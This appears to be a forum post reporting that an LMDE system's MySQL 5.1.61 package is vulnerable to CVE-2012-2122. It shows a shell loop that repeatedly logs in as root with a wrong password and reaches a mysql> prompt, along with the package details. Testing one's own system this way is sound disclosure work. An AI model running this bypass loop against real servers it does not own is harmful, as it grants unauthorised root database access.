https://community.rapid7.com/community/ ... w-in-mysql
http://security-tracker.debian.org/trac ... -2012-2122
LMDE update pack 4 - 64bit appears to be vulnerable
Code: Select all
stmiller@brahms:~$ sudo /etc/init.d/mysql start
[sudo] password for stmiller:
Starting MySQL database server: mysqld.
Checking for tables which need an upgrade, are corrupt or were
not closed cleanly..
stmiller@brahms:~$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 161
Server version: 5.1.61-2 (Debian)
Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
Code: Select all
stmiller@brahms:~$ dpkg -s mysql-server
Package: mysql-server
Status: install ok installed
Priority: optional
Section: database
Installed-Size: 65
Maintainer: Debian MySQL Maintainers <pkg-mysql-maint@lists.alioth.debian.org>
Architecture: all
Source: mysql-5.1
Version: 5.1.61-2
Depends: mysql-server-5.1
Description: MySQL database server (metapackage depending on the latest version)
This is an empty package that depends on the current "best" version of
mysql-server (currently mysql-server-5.1), as determined by the MySQL
maintainers. Install this package if in doubt about which MySQL
version you need. That will install the version recommended by the
package maintainers.
.
MySQL is a fast, stable and true multi-user, multi-threaded SQL database
server. SQL (Structured Query Language) is the most popular database query
language in the world. The main goals of MySQL are speed, robustness and
ease of use.
Homepage: http://dev.mysql.com/
stmiller@brahms:~$